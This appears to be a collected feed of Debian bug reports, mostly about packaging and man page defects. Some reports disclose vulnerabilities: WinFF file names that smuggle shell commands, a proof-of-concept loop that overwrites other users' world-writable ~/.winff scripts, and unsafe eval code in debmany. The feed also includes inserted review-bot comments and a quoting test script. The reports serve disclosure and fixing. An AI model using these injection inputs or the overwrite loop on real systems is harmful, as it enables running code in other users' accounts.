Bug#1071939: taskwarrior: Naming conflict with go-task task tool
Control: forwarded -1 https://github.com/GothenburgBitFactory/taskwarrior/issues/3463

FWIW, go-task is not in Debian, but it's been ITP-ed: #1032658

-- Jakub Wilk
Bug#1032658: ITP: go-task -- A task runner / simpler Make alternative written in Go
* Mark E. Fuller, 2023-03-10 17:30:
> * URL : https://github.com/go-task/task

The executable name is "task", but this name is already taken by taskwarrior; see bug #1071939.

-- Jakub Wilk
Bug#1072297: lastlog(8) man page: stray XML markup
Package: login
Version: 1:4.13+dfsg1-1+b1
Severity: minor

I stumbled upon this:

   $ man lastlog.8 | grep -w term
   Having high UIDs can create problems when handling the /var/log/lastlog with external tools. Although the

I suppose this XML markup shouldn't be there.

-- Jakub Wilk
Bug#1068017: Y2038-safe replacements for utmp/wtmp and lastlog
* Jun MO, 2024-05-31 01:05:
> And something "off topic". I find there is a char __glibc_reserved[20] variable in the struct utmp, which is commented as "Reserved for future use". Just a brainstorm, if this variable is not currently used, maybe it can be used to solve the Y2038 problem for wtmp?

Or, more easily, you could treat the timestamp as unsigned int:

https://sourceware.org/cgit/glibc/commit/?id=5361ad3910c257bc

"Architectures which use a 32-bit seconds-since-epoch field in struct lastlog, struct utmp, struct utmpx (such as i386, powerpc64le, rv32, rv64, x86-64) switched from a signed to an unsigned type for that field. This allows these fields to store timestamps beyond the year 2038, until the year 2106. Please note that applications are still expected to migrate off the interfaces declared in and (except for login_tty) due to locking and session management problems."

-- Jakub Wilk
Bug#1071493: multiplex on bookworm: TypeError: 'multiple' is not valid with 'is_flag', use 'count'
Package: multiplex
Version: 0.6.0-1

I installed multiplex on a bookworm system, but it doesn't work:

   $ mp --help
   Traceback (most recent call last):
     File "/usr/bin/mp", line 5, in
       from multiplex.main import main
     File "/usr/lib/python3/dist-packages/multiplex/main.py", line 89, in
       @click.option("--wait/--no-wait", "-w/-W", multiple=True, default=None)
        ^^
     File "/usr/lib/python3/dist-packages/click/decorators.py", line 308, in decorator
       _param_memo(f, OptionClass(param_decls, **option_attrs))
     File "/usr/lib/python3/dist-packages/click/core.py", line 2584, in __init__
       raise TypeError("'multiple' is not valid with 'is_flag', use 'count'.")
   TypeError: 'multiple' is not valid with 'is_flag', use 'count'.

It looks like support for multiple= with flags was added upstream in 8.1.4[*], but bookworm has only 8.1.3. Please add an appropriate versioned dependency to the package.

[*] https://github.com/pallets/click/commit/b36e3ede781b388a

-- System Information:

Versions of packages multiplex depends on:
ii  python3-multiplex  0.6.0-1
ii  python3            3.11.2-1+b1

-- Jakub Wilk
Bug#1071188: flite: bad formatting of man page references
Package: flite Version: 2.2-5 Severity: minor Tags: patch -- Jakub Wilk From: Jakub Wilk Date: Wed, 15 May 2024 17:37:34 +0200 Subject: [PATCH] Fix formatting of man page references --- debian/flite.1 | 4 +++- debian/flite_time.1 | 3 ++- debian/t2p.1| 4 +++- 3 files changed, 8 insertions(+), 3 deletions(-) diff --git a/debian/flite.1 b/debian/flite.1 index c771ced..5f63801 100644 --- a/debian/flite.1 +++ b/debian/flite.1 @@ -61,3 +61,5 @@ Verbose output. .SH SEE ALSO -.BR flite_time (1), " " t2p (1), " " festival (1) +.BR flite_time (1), +.BR t2p (1), +.BR festival (1) .SH AUTHOR diff --git a/debian/flite_time.1 b/debian/flite_time.1 index 656768c..13beb3c 100644 --- a/debian/flite_time.1 +++ b/debian/flite_time.1 @@ -20,3 +20,4 @@ Announce the current time. .SH SEE ALSO -.BR flite (1), " " festival (1) +.BR flite (1), +.BR festival (1) .SH AUTHOR diff --git a/debian/t2p.1 b/debian/t2p.1 index f400398..f4da1e1 100644 --- a/debian/t2p.1 +++ b/debian/t2p.1 @@ -15,3 +15,5 @@ No options. .SH SEE ALSO -.BR flite (1), " " flite_time (1), " " festival (1) +.BR flite (1), +.BR flite_time (1), +.BR festival (1) .SH AUTHOR -- 2.39.2
Bug#1071186: units --round: null pointer dereference
Package: units
Version: 2.22-2

I've run into this:

   $ units --round 0.1s hms
   Segmentation fault

GDB says it's a null pointer dereference:

   Program received signal SIGSEGV, Segmentation fault.
   0x56563973 in showunitlist (havestr=0xd9d3 "0.1s", have=0x565722c0 , wantstr=) at ./units.c:5577
   5577    if (isdecimal(*lastunitstr))
   (gdb) print lastunitstr
   $1 = 0x0
   (gdb) bt
   #0  0x56563973 in showunitlist (havestr=0xd9d3 "0.1s", have=0x565722c0 , wantstr=) at ./units.c:5577
   #1  0x565580a5 in main (argc=4, argv=0xd7e4) at ./units.c:6235

-- System Information:
Architecture: i386

Versions of packages units depends on:
ii  libc6         2.36-9+deb12u7
ii  libreadline8  8.2-1.3

Versions of packages units recommends:
ii  python3           3.11.2-1+b1
ii  python3-requests  2.28.1+dfsg-1

-- Jakub Wilk
Bug#755434: pmount: please support exfat filesystem (via fuse)
* Vincent Danjean , 2024-05-04 23:56: ++{ "exfat", "nosuid,nodev,user", 1, "077", ",iocharset=%s",",fmask=%04o,dmask=%04o"}, Thanks, that does the trick for me. :) -- Jakub Wilk
Bug#755434: pmount: please support exfat filesystem (via fuse)
* Vincent Danjean , 2016-12-25 23:36: ++{ "exfat", "nosuid,nodev,user,quiet,nonempty", 1, "077", ",iocharset=%s",",fmask=%04o,dmask=%04o"}, This doesn't work for me. In dmesg I see: exfat: Unknown parameter 'quiet' -- Jakub Wilk
Bug#1069053: toilet man page: @PACKAGE_VERSION@
Package: toilet
Version: 0.3-1.4

There's unexpanded @PACKAGE_VERSION@ in the man page:

   $ man toilet | tail -n1
   libcaca @PACKAGE_VERSION@ 2006‐11‐10 toilet(1)

-- System Information:
Architecture: i386

-- Jakub Wilk
Bug#901071: Looks for a file named "-" in the current directory
* Josh Triplett, 2018-06-08 09:51:
> When invoked with stdin from a pipe, less looks for a file named "-" in the current directory.

This was fixed upstream in v509:
https://github.com/gwsw/less/commit/2195072f4676dc84

But a similar bug was reintroduced in v546:
https://github.com/gwsw/less/commit/128c1dfe9d01ca7c
https://github.com/gwsw/less/issues/289

It was finally fixed upstream in v616.

-- Jakub Wilk
Bug#1068471: winff: shell injection
Package: winff
Version: 1.6.3+dfsg-2
Tags: security

As a follow-up to #1053373, WinFF still doesn't correctly escape filenames it passes to shell.

To reproduce, try converting the file created by this command:

   touch '\"; cowsay pwned >&2 #.mp3'

-- System Information:
Architecture: i386

Versions of packages winff depends on:
ii  winff-qt  1.6.3+dfsg-2

-- Jakub Wilk
Bug#1068247: apt-transport-tor: add security-debug mirror to README
Package: apt-transport-tor
Version: 0.5

Please add

   * security-debug.backend.mirrors.debian.org
     tor+http://i3hhdhcoozin2qyb5yhhufszgvhz6m2zfy6n6len2gjmetvbnnxcenyd.onion/

to README.md.

-- Jakub Wilk
Bug#1067454: presentty: bad domain in Homepage and d/copyright
Source: presentty
Version: 0.2.1-1.1

The Homepage field in debian/control and the Source field debian/copyright point to <http://git.inaugust.org/cgit/presentty/>, but there's no such domain. According to README.rst, it should be s/org/com/.

-- Jakub Wilk
Bug#1067172: ruff: E999 SyntaxError: Got unexpected unicode
Package: ruff
Version: 0.0.291+dfsg1-3
Tags: fixed-upstream

ruff can't parse some \N{} sequences correctly, e.g.:

   $ cat stx.py
   print(ascii('\N{STX}'))

   $ python3 stx.py
   '\x02'

   $ ruff check stx.py
   error: Failed to parse stx.py:1:17: Got unexpected unicode
   stx.py:1:17: E999 SyntaxError: Got unexpected unicode
   Found 1 error.

As far as I can see, it's already fixed upstream; I can't reproduce it with upstream ruff 0.3.3.

-- System Information:
Architecture: amd64

Versions of packages ruff depends on:
ii  libc6      2.36-9+deb12u4
ii  libgcc-s1  12.2.0-14

-- Jakub Wilk

print(ascii('\N{STX}'))
Bug#1066819: dput manpage: missing space between "-S," and "--unset"
Source: dput-ng Version: 1.39 Severity: minor Tags: patch -- Jakub Wilk From ac7204149aa6538ff02413222e0f438374a24d41 Mon Sep 17 00:00:00 2001 From: Jakub Wilk Date: Mon, 11 Mar 2024 10:36:50 +0100 Subject: [PATCH] dput manpage: add missing space --- docs/man/dput.1.man | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/man/dput.1.man b/docs/man/dput.1.man index a627a9c..c7bf898 100644 --- a/docs/man/dput.1.man +++ b/docs/man/dput.1.man @@ -113,7 +113,7 @@ OPTIONS connection is set-up (for example logging in through the FTP or SFTP protocol) and tested for its functionality. -*-S,--unset*=OVERRIDE:: +*-S, --unset*=OVERRIDE:: Override the configured profile key by unsetting its value. See *-O* for a full explanation of the behavior. -- 2.39.2
Bug#1065563: salsa: typo "branch as no origin"
Package: devscripts Version: 2.23.7 Severity: minor Tags: patch -- Jakub Wilk diff --git a/lib/Devscripts/Salsa/merge_request.pm b/lib/Devscripts/Salsa/merge_request.pm index 89152aa9..7682bb52 100644 --- a/lib/Devscripts/Salsa/merge_request.pm +++ b/lib/Devscripts/Salsa/merge_request.pm @@ -47,3 +47,3 @@ sub merge_request { ds_warn - "Current branch as no origin or isn't pushed, aborting"; + "Current branch has no origin or isn't pushed, aborting"; return 1;
Bug#1065561: console-setup: typos in documentation
Source: console-setup Version: 1.226 Severity: minor Tags: patch -- Jakub Wilk diff --git a/README.legacyfonts b/README.legacyfonts index a707fcc..2078725 100644 --- a/README.legacyfonts +++ b/README.legacyfonts @@ -4,3 +4,3 @@ LEGACY FONTS: CONVERSION FROM PSF TO BDF -The traditional font collection for Linux consolle was a big mess. +The traditional font collection for Linux console was a big mess. There were many different fonts and nobody in the world knew the exact @@ -18,4 +18,4 @@ generated for a group of fonts that share common typeface. Console fonts that didn't have embedded Unicode table were simply ignored. -The fonts LatArCyrHeb* were also ignored - partialy due to technical -reasons and partialy because the other BDF fonts are better source for +The fonts LatArCyrHeb* were also ignored - partially due to technical +reasons and partially because the other BDF fonts are better source for making Unicode console fonts. @@ -43,3 +43,3 @@ For example Greek-vga14.psf is the legacy font for Greek code set and size 14. The list of BDF fonts that is used to produce -Greek-vga14.psf was determined as folows. +Greek-vga14.psf was determined as follows. diff --git a/doc/console-setup.html/ch3.html b/doc/console-setup.html/ch3.html index c2d3a1f..bc74c33 100644 --- a/doc/console-setup.html/ch3.html +++ b/doc/console-setup.html/ch3.html @@ -64,4 +64,4 @@ for a group of fonts that share common typeface. Console fonts that didn't have embedded Unicode table were simply ignored. The fonts -LatArCyrHeb* were also ignored - partialy due to technical reasons -and partialy because the other BDF fonts are better source for making Unicode +LatArCyrHeb* were also ignored - partially due to technical reasons +and partially because the other BDF fonts are better source for making Unicode console fonts. 
@@ -148,3 +148,3 @@ fonts. This font is named after the scheme size 14. The list of BDF fonts that is used to produce Greek-vga14.psf was -determined as folows. +determined as follows. diff --git a/doc/console-setup.sgml b/doc/console-setup.sgml index 46e16a6..54f7fdf 100644 --- a/doc/console-setup.sgml +++ b/doc/console-setup.sgml @@ -388,3 +388,3 @@ Console fonts that didn't have embedded Unicode table were simply ignored. The fonts LatArCyrHeb* were also ignored - -partialy due to technical reasons and partialy because the other BDF +partially due to technical reasons and partially because the other BDF fonts are better source for making Unicode console fonts. @@ -465,3 +465,3 @@ from the legacy fonts. This font is named after the scheme set and size 14. The list of BDF fonts that is used to produce -Greek-vga14.psf was determined as folows. +Greek-vga14.psf was determined as follows.
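Review bot: the corrected lines in README.legacyfonts (@@ -18,4), doc/console-setup.html/ch3.html (@@ -64,4) and doc/console-setup.sgml (@@ -388,3) still read "the other BDF fonts are better source for"; since these sentences are being touched anyway, change them to "are a better source for". The same two sentences are patched in both ch3.html and console-setup.sgml, so if the HTML is generated from the SGML it would be cleaner to patch only the source and regenerate.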
Bug#1065508: python3-markdown-it should recommend or suggest python3-linkify-it
Package: python3-markdown-it
Version: 2.1.0-5

Please add python3-linkify-it to Recommends or Suggests, as it's needed for some functionality:

   >>> from markdown_it import MarkdownIt
   >>> md = MarkdownIt('gfm-like')
   >>> md.parse('foo')
   Traceback (most recent call last):
     File "", line 1, in
     File "/usr/lib/python3/dist-packages/markdown_it/main.py", line 252, in parse
       self.core.process(state)
     File "/usr/lib/python3/dist-packages/markdown_it/parser_core.py", line 32, in process
       rule(state)
     File "/usr/lib/python3/dist-packages/markdown_it/rules_core/linkify.py", line 30, in linkify
       raise ModuleNotFoundError("Linkify enabled but not installed.")
   ModuleNotFoundError: Linkify enabled but not installed.

-- System Information:
Architecture: i386

Versions of packages python3-markdown-it depends on:
ii  python3-mdurl              0.1.2-1
ii  python3-typing-extensions  4.4.0-1
ii  python3                    3.11.2-1+b1

-- Jakub Wilk
Bug#1065488: torbrowser-launcher should recommend libasound2
Package: torbrowser-launcher
Version: 0.3.7-1

Tor Browser doesn't start if libasound2 is not installed:

   $ ~/.local/share/torbrowser/tbb/x86_64/tor-browser/Browser/start-tor-browser --verbose
   XPCOMGlueLoad error for file /home/jwilk/.local/share/torbrowser/tbb/x86_64/tor-browser/Browser/libxul.so:
   libasound.so.2: cannot open shared object file: No such file or directory
   Couldn't load XPCOM.

Please add libasound2 to Recommends.

-- Jakub Wilk
Bug#1065418: dglob man page: typo "de" → "the"
Package: debian-goodies Version: 0.88.1 Severity: minor Tags: patch -- Jakub Wilk diff --git a/dglob.pod b/dglob.pod index 6a483b3..e304b21 100644 --- a/dglob.pod +++ b/dglob.pod @@ -24,3 +24,3 @@ this behavior (see L<"OPTIONS">). If you use dglob with the B<-f> option, all files in the matched packages -are listed instead of their names. If you do not use de B<-a> switch, +are listed instead of their names. If you do not use the B<-a> switch, only existing, plain (i.e. no symlinks, directories or other special ones)
Bug#873376: input-utils: events and other items are no longer shown as clear text
Control: tags -1 + fixed-upstream

This is easiest to reproduce with input-events(1). You get a bunch of nulls and question marks:

   # input-events -t 1 0
   /dev/input/event0
      bustype : BUS_I8042
      vendor  : 0x1
      product : 0x1
      version : 43841
      name    : "AT Translated Set 2 keyboard"
      phys    : "isa0060/serio0/input0"
      bits ev : (null) (null) (null) (null) (null)

   waiting for events
   09:06:41.937125: (null) ??? 28
   09:06:41.937125: (null) ??? (0x1c) released
   09:06:41.937125: (null) code=0 value=0
   timeout, quitting

... instead of symbolic constants:

   # input-events -t 1 0
   /dev/input/event0
      bustype : BUS_I8042
      vendor  : 0x1
      product : 0x1
      version : 43841
      name    : "AT Translated Set 2 keyboard"
      phys    : "isa0060/serio0/input0"
      bits ev : EV_SYN EV_KEY EV_MSC EV_LED EV_REP

   waiting for events
   09:12:04.424055: EV_MSC MSC_SCAN 28
   09:12:04.424055: EV_KEY KEY_ENTER (0x1c) released
   09:12:04.424055: EV_SYN code=0 value=0
   timeout, quitting

Upstream fixes:
https://git.kraxel.org/cgit/input/commit/?id=c3f5e30069efd2d645121652f1eb63cdcb725194
https://git.kraxel.org/cgit/input/commit/?id=fd1bab80e5f9e514facce49c1a462c04ed9df991

-- Jakub Wilk
Bug#1064069: python3-looseversion: bogus package description
Package: python3-looseversion
Version: 1.3.0-1

The package description is completely wrong:

   $ apt-cache show python3-looseversion | grep-dctrl -s Description-en ''
   Description-en: Python module for simple PAM authentications (Python 3)
    Provide an authenticate() function that will allow the caller to authenticate a user against the Pluggable Authentication Modules (PAM) on the system.
    .
    The module pam.py is a single file, implemented using ctypes, so no compilation is necessary.
    This package provides the pam.py module for Python 3.

-- Jakub Wilk
Bug#1063857: github-backup: commit messages don't end with newline
* Jakub Wilk, 2024-02-13 18:00:
> Commit messages created by github-backup don't end with newline

... which breaks git-log a bit:

#1063859 "git: commit msg without trailing \n breaks 'git log --grep'ing for notes"

-- Jakub Wilk
Bug#1063859: git: commit msg without trailing \n breaks "git log --grep"ing for notes
Package: git
Version: 1:2.39.2-1.1

Let's create a commit with a message that doesn't end with newline¹, and attach a note to it:

   $ commit=$(printf 'foo' | git commit-tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904)
   $ git notes add -m bar $commit
   $ git log $commit --grep bar
   commit e0e2391bad1644f1dd580c0d5d6c5b58addf2870
   Author: Jakub Wilk
   Date:   2024-02-13 18:00:51 +0100

       foo
   Notes:
       bar

So far so good, but if you anchor the regex, the commit can no longer be found:

   $ git log $commit --grep ^bar
   [nothing]

Apparently that's because git concatenates the commit message and the note without inserting newline between them:

   $ git log $commit --grep ^foobar
   commit e0e2391bad1644f1dd580c0d5d6c5b58addf2870
   Author: Jakub Wilk
   Date:   2024-02-13 18:00:51 +0100

       foo
   Notes:
       bar

¹ See also bug #1063857 "github-backup: commit messages don't end with newline".

-- System Information:
Architecture: i386

Versions of packages git depends on:
ii  libc6            2.36-9+deb12u4
ii  libcurl3-gnutls  7.88.1-10+deb12u5
ii  libexpat1        2.5.0-1
ii  libpcre2-8-0     10.42-1
ii  zlib1g           1:1.2.13.dfsg-1
ii  perl             5.36.0-7+deb12u1
ii  liberror-perl    0.17029-2
ii  git-man          1:2.39.2-1.1

-- Jakub Wilk
Bug#1063857: github-backup: commit messages don't end with newline
Package: github-backup
Version: 1.20200721-2+b1

Commit messages created by github-backup don't end with newline:

   $ git clone -q https://github.com/jwilk/cowproxy
   $ cd cowproxy
   $ github-backup --no-forks
   Gathering metadata for https://github.com/jwilk/cowproxy.git ...
   $ git cat-file commit github && echo '<-- no newline here'
   tree e4fe2ef1f08a9145c7234e0fab086a9c12781eab
   parent 9d6d276c144804c026ac35195b6adddb764c4a35
   author Jakub Wilk 1707842905 +0100
   committer Jakub Wilk 1707842905 +0100

   github-backup<-- no newline here

This is unlike commit messages created by "git commit":

   $ git cat-file commit HEAD && echo '^-- yay'
   tree 91b21d2098618e30ec4c87eef0e3ed505f281f53
   parent 6eae506db2f48cb85ffd959e2cb2385a0a87e948
   author Jakub Wilk 1706350373 +0100
   committer Jakub Wilk 1706350373 +0100

   CI: upgrade actions/cache to v4.
   ^-- yay

-- System Information:
Architecture: i386

Versions of packages github-backup depends on:
ii  libc6                  2.36-9+deb12u4
ii  libdouble-conversion3  3.2.1-1
ii  libffi8                3.4.4-1
ii  libgmp10               2:6.2.1+dfsg1-1.1
ii  libstdc++6             12.2.0-14
ii  zlib1g                 1:1.2.13.dfsg-1
ii  git                    1:2.39.2-1.1

-- Jakub Wilk
Bug#1063834: displayfont man page: "showfont (no such manpage?)"
Package: console-cyrillic
Version: 0.9-17.2
Severity: minor

The SEE ALSO section of the displayfont(1) manual page says:

   showfont (no such manpage?)

But it does exist:

   $ dpkg -S showfont.1
   x11-xfs-utils: /usr/share/man/man1/showfont.1.gz

-- Jakub Wilk
Bug#1063761: xfonts-terminus: no Homepage field
Source: xfonts-terminus
Version: 4.48-3.1
Severity: minor

Please add

   Homepage: https://terminus-font.sourceforge.net/

to debian/control.

-- Jakub Wilk
Bug#1063760: dumppsf can't dump some fonts
Package: console-cyrillic
Version: 0.9-17.2

dumppsf fails to dump some fonts, e.g.:

   $ zcat /usr/share/consolefonts/Uni2-TerminusBold14.psf.gz > tmp.psf
   $ dumppsf tmp.psf
   PSF mode 3, charsize=14
   Read 9776bytes of unicode table

-- System Information:
Architecture: i386

Versions of packages console-cyrillic depends on:
ii  perl-base  5.36.0-7+deb12u1
ii  debconf    1.5.82
ii  kbd        2.5.1-1+b1

Versions of packages console-cyrillic suggests:
ii  perl           5.36.0-7+deb12u1
ii  console-setup  1.221

-- Jakub Wilk
Bug#1063335: RFP: chafa.py -- Python bindings for Chafa
Package: wnpp
Severity: wishlist

* Package name    : chafa.py
  Version         : 1.1.2
  Upstream Author : Erica Ferrua Edwardsdóttir
* URL             : https://chafapy.mage.black/
* License         : LGPL-3.0
  Programming Lang: Python
  Description     : Python bindings for Chafa

-- Jakub Wilk
Bug#1063237: tmux: crash when pasting into dead pane
Package: tmux
Version: 3.3a-3

I've run into this:

   $ tmux set-option -g remain-on-exit \; new-session -d false
   $ tmux set-buffer x \; paste-buffer
   server exited unexpectedly

In dmesg I see:

   tmux: server[4496]: segfault at 8c ip f7ee162b sp ffb537a4 error 4 in libevent_core-2.1.so.7.0.1[f7ed9000+2] likely on CPU 1 (core 1, socket 0)

Backtrace:

   #0  0xf7ea662b in bufferevent_write (bufev=0x0, data=0x5745f730, size=1) at ./bufferevent.c:454
   #1  0x5659d0a6 in cmd_paste_buffer_exec (self=0x57442f20, item=0x574751d0) at ./cmd-paste-buffer.c:98
   #2  0x5659e892 in cmdq_fire_command (item=0x574751d0) at ./cmd-queue.c:647
   #3  cmdq_next (c=0x57480b00) at ./cmd-queue.c:763
   #4  0x565ee113 in server_loop () at ./server.c:270
   #5  0x565da562 in proc_loop (tp=0x57438580, loopcb=0x565ee0b0 ) at ./proc.c:222
   #6  0x565ee96c in server_start (client=0x57437d00, flags=402718720, base=0x57437600, lockfd=5, lockfile=0x57437950 "") at ./server.c:251
   #7  0x5658e72b in client_connect (flags=, path=0x57437500 "/tmp/tmux-1000/default", base=0x57437600) at ./client.c:164
   #8  client_main (base=0x57437600, argc=7, argv=0xfffed398, flags=, feat=0) at ./client.c:287
   #9  0x56589432 in main (argc=7, argv=) at ./tmux.c:519

-- System Information:
Architecture: i386

Versions of packages tmux depends on:
ii  libc6                2.36-9+deb12u4
ii  libevent-core-2.1-7  2.1.12-stable-8
ii  libtinfo6            6.4-4
ii  libutempter0         1.2.1-3

-- Jakub Wilk
Bug#1062774: xdotool: "mousemove --sync" can take 15s
Package: xdotool
Version: 1:3.20160805.1-5

"xdotool mousemove --sync" takes over 15 seconds if the mouse cursor is already in the right location:

   $ for i in 1 2; do time xdotool mousemove --sync 37 42; done

   real    0m0.007s
   user    0m0.003s
   sys     0m0.003s

   real    0m15.236s
   user    0m0.025s
   sys     0m0.030s

-- System Information:
Architecture: i386

Versions of packages xdotool depends on:
ii  libc6     2.36-9+deb12u4
ii  libx11-6  2:1.8.4-2+deb12u2
ii  libxdo3   1:3.20160805.1-5

-- Jakub Wilk
Bug#1061780: python3-argcomplete: zsh support not in description
Package: python3-argcomplete
Version: 3.1.4-1

The package description mentions only bash, but zsh is supported too since v3.0.

-- Jakub Wilk
Bug#1031267: debmany: shell injection
Possible alternative approach: if the path contains any suspicious characters, create a temporary symlink with a safe name, and pass that symlink to eval instead. I'm not sure it's a _better_ approach, but maybe worth considering. (I stole the idea from run-mailcap(1).) * Axel Beckert , 2023-02-19 05:47: So I came up with the following fix which uses command instead of eval, and bash pattern substitution to replace %s with the file name instead letting printf inside an $() doing the substitution: I fear that someone might be using -m or -o with shell constructs that this change will break. Maybe it's a good tradeoff, but it should be documented. + cmdarr=($@) You should disable glob expansion here. + for i in ${!cmdarr[@]}; do +cmdarr[$i]="${cmdarr[$i]/\%s/$replacement}" + done You should either replace all %s occurrences, or just the first one. The above code sits oddly in the middle: it replaces the first occurrence in every argument. - eval $(printf "gzip -dc $PWD/$return | $othercmdline") + gzip -dc "$PWD/$return" | replace_percent_s_and_execute '-' "$othercmdline" Passing "-" instead of skipping the argument is another potential incompatibility. -- Jakub Wilk
Bug#1061643: debmany -x: can't show compressed files in /usr/share/doc
Package: debian-goodies
Version: 0.88.1
Severity: minor

If you use the -x option, debmany cannot show compressed files in /usr/share/doc: it tries to run xdg-run without arguments, which doesn't work.

I guess -k might have the same problem.

-- Jakub Wilk
Bug#1061641: debmany: -k, -x underdocumented
Package: debian-goodies
Version: 0.88.1
Severity: minor

The man page says -x is shorthand for "-m 'xdg-open man:%s'", but in reality it also sets viewer for other files.

The -k option has the same issue.

-- Jakub Wilk
Bug#1061586: ~/.winff/*.sh are world-writable
Package: winff Version: 1.5.5-9 Tags: security patch As it was noted in <https://github.com/WinFF/winff/issues/242>, WinFF changes permissions of ~/.winff/*.sh files to 0777, which is world-writable! Assuming default permissions of the home directory and the .winff subdir, this can be exploited by local users to execute arbitrary code with the context of the user running WinFF. I've attached a proof-of-concept exploit. (It's not 100% reliable.) I've also attached an untested patch. -- Jakub Wilk #!/bin/sh while true do for file in /home/*/.winff/*.sh do echo 'cowsay pwned >&2; sleep inf' | tee "$file" > /dev/null done done diff --git a/winff/unit1.pas b/winff/unit1.pas index 71689a6..6a77b02 100644 --- a/winff/unit1.pas +++ b/winff/unit1.pas @@ -1354,7 +1354,7 @@ begin script.SaveToFile(presetspath+batfile); {$ifdef unix} - fpchmod(presetspath + batfile,&777); + fpchmod(presetspath + batfile,&700); {$endif} scriptprocess.ShowWindow := swoNone; @@ -2494,7 +2494,7 @@ begin // get setup begin {$ifdef unix} - fpchmod(presetspath + batfile,&777); + fpchmod(presetspath + batfile,&700); {$endif} // do it
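Review bot: both hunks in winff/unit1.pas (@@ -1354 and @@ -2494) ignore the return value of fpchmod, so if the call fails the script is still run with whatever mode it already had; check the result and abort before executing. In the first hunk the file is also written by script.SaveToFile before its mode is tightened, so creating it under a restrictive umask would avoid depending on the later chmod. Scripts left at 0777 by earlier versions may already have been modified by the time this change takes effect, which deserves a line in the changelog.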
Bug#1053373: winff: shell injection
Control: found -1 1.6.2+dfsg-2

The fix is insufficient. To reproduce, try converting the file created by this command:

   touch '`cowsay pwned >&2; sleep inf`.mp3'

Single-quoted strings are better suited for shell-escaping, because the only character to take care of is the single quote itself. That is, the whole escaping procedure could look like this:

1) Replace every ' character with: '\''
2) Add single quotes around the whole thing.

-- Jakub Wilk
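The two-step escaping procedure from the message above, as an added example that is not part of the original report and is not WinFF's code: `sh_quote` implements it in POSIX sh, next to `naive_quote`, a constructed stand-in for an escaper that wraps the name in double quotes and only backslash-escapes `"`. The file names are constructed to mirror the shapes in the reports, with a harmless `touch INJECTED` as the embedded command; all function names are assumptions of this example.

```shell
#!/bin/sh
# replace_all STRING CHAR REPLACEMENT: leaves the result in $_out.
# Pure parameter expansion, so backslashes and newlines pass through as-is.
replace_all() {
    _rest=$1
    _out=
    while :; do
        case $_rest in
            *"$2"*)
                _out=$_out${_rest%%"$2"*}$3   # text before the first CHAR, then REPLACEMENT
                _rest=${_rest#*"$2"}          # continue after that CHAR
                ;;
            *)
                _out=$_out$_rest
                break
                ;;
        esac
    done
}

# Step 1: replace every ' with '\''   Step 2: wrap the result in single quotes.
sh_quote() {
    replace_all "$1" "'" "'\\''"
    printf "'%s'" "$_out"
}

# Constructed weak variant: escape " as \" and wrap in double quotes.
# $(...), backticks and backslashes keep their meaning inside double quotes.
naive_quote() {
    replace_all "$1" '"' '\"'
    printf '"%s"' "$_out"
}

# Stand-ins for a program that builds a command line as a string and hands it
# to the shell; printf '%s' plays the role of the real converter command.
run_naive()  { sh -c "printf '%s' $(naive_quote "$1")"; }
run_quoted() { sh -c "printf '%s' $(sh_quote "$1")"; }

# survives RUNNER NAME: returns 0 only if the shell saw NAME byte-for-byte
# and the embedded command did not create the INJECTED marker file.
survives() {
    _dir=$(mktemp -d) || return 2
    _got=$(cd "$_dir" && "$1" "$2")
    _rc=0
    [ -e "$_dir/INJECTED" ] && _rc=1
    [ "$_got" = "$2" ] || _rc=1
    rm -rf "$_dir"
    return $_rc
}

# Constructed file names: command substitution, backticks, a backslash-quote
# breakout, and a plain name containing a single quote.
for name in '$(touch INJECTED).mp3' '`touch INJECTED`.mp3' \
            '\"; touch INJECTED #.mp3' "it's.mp3"; do
    for runner in run_naive run_quoted; do
        if survives "$runner" "$name"; then verdict=intact; else verdict=BROKEN; fi
        printf '%-10s %-6s %s\n' "$runner" "$verdict" "$name"
    done
done
```

The marker-file check separates "the name was mangled" from "the embedded command ran"; a fix that builds an argument vector and never goes through a shell avoids the quoting question entirely.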
Bug#1061303: json2bson: AttributeError: 'NoneType' object has no attribute 'encode'
Package: reserialize
Version: 20220929-2
Severity: minor

I ran into this:

   $ echo '{}' | json2bson > /dev/null
   Traceback (most recent call last):
     File "/usr/bin/json2bson", line 88, in
       fh_dumpers[otype](data, ofh)
     File "/usr/bin/json2bson", line 39, in
       "bson": lambda arg, fh: fh.write(bson.encode(arg)),
       ^^^
   AttributeError: 'NoneType' object has no attribute 'encode'

Apparently that's because I didn't have python3-bson installed, but the error message didn't give me any clue about what's wrong.

-- Jakub Wilk
Bug#1031267: debmany: shell injection
The example viewer in the man page also uses eval:

   #!/bin/dash
   read -p "program to use: " pgm
   eval $pgm "$1"

Please fix it too.

-- Jakub Wilk
Bug#769748: gpm cannot distinguish between Russian and English "a" if a font is terminus unicode bold with console-cyrillic
* Askar Safin, 2014-11-16 07:06:
> Steps to reproduce:
> * Install gpm and console-cyrillic
> * Configure console-cyrillic and choose terminus unicode bold as a font
> * Restart console-cyrillic
> * Type Russian letters "а" and "о" (which look exactly same as English "a" and "o")
> * Copy them to clipboard using gpm
> * Paste
>
> What I get:
> * I get English "a" and "o"
>
> What I expected to get:
> * Russian "а" and "о"

This is not a gpm bug. Gpm is not deeply involved in the copying and pasting operation: it just tells the kernel what part of screen to copy and when to paste.

What you're seeing is caused by limitations of the Linux kernel and a font design choice:

1. The kernel limits the number of glyphs in the font to 256 (or 512 if you're OK with reduced number of available colors).

2. To work around this limit, and to fit as many characters as possible into a single font, the Terminus fonts reuse the same glyphs for characters that look the same (or almost the same), such as Latin "a" and Cyrillic "а".

3. The kernel didn't track which Unicode _characters_ appeared on screen, only which _glyphs_ did. (So the distinction between Latin "a" and Cyrillic "а" got lost.)

Fortunately, the last point is partially fixed since v4.19: if you read from a /dev/vcsuN device, the kernel will start to keep track of Unicode characters on screen, and they should be properly copy-pastable. See the following kernel commits:

https://git.kernel.org/linus/9bfdc2611d417be453c3deb7a7ef2ffc718febfa
https://git.kernel.org/linus/d21b0be246bf3bbf569e6e239f56abb529c7154e

-- Jakub Wilk
Bug#728752: [getbuildlog] get compressed buildlogs
* James McCoy, 2013-11-20 00:58:
> On Mon, Nov 04, 2013 at 10:12:45PM -0300, Lisandro Damián Nicanor Pérez Meyer wrote:
>> Since gcc became more verbose on it builds it's not strange to find enormous build logs (200+MB). It would be really cool if getbuildlog could get the compressed buildlog to save bandwidth.

You may want to give pkgkde-getbuildlogs (from pkg-kde-tools) a try: it requests compressed responses and (IMHO) has a nicer API.

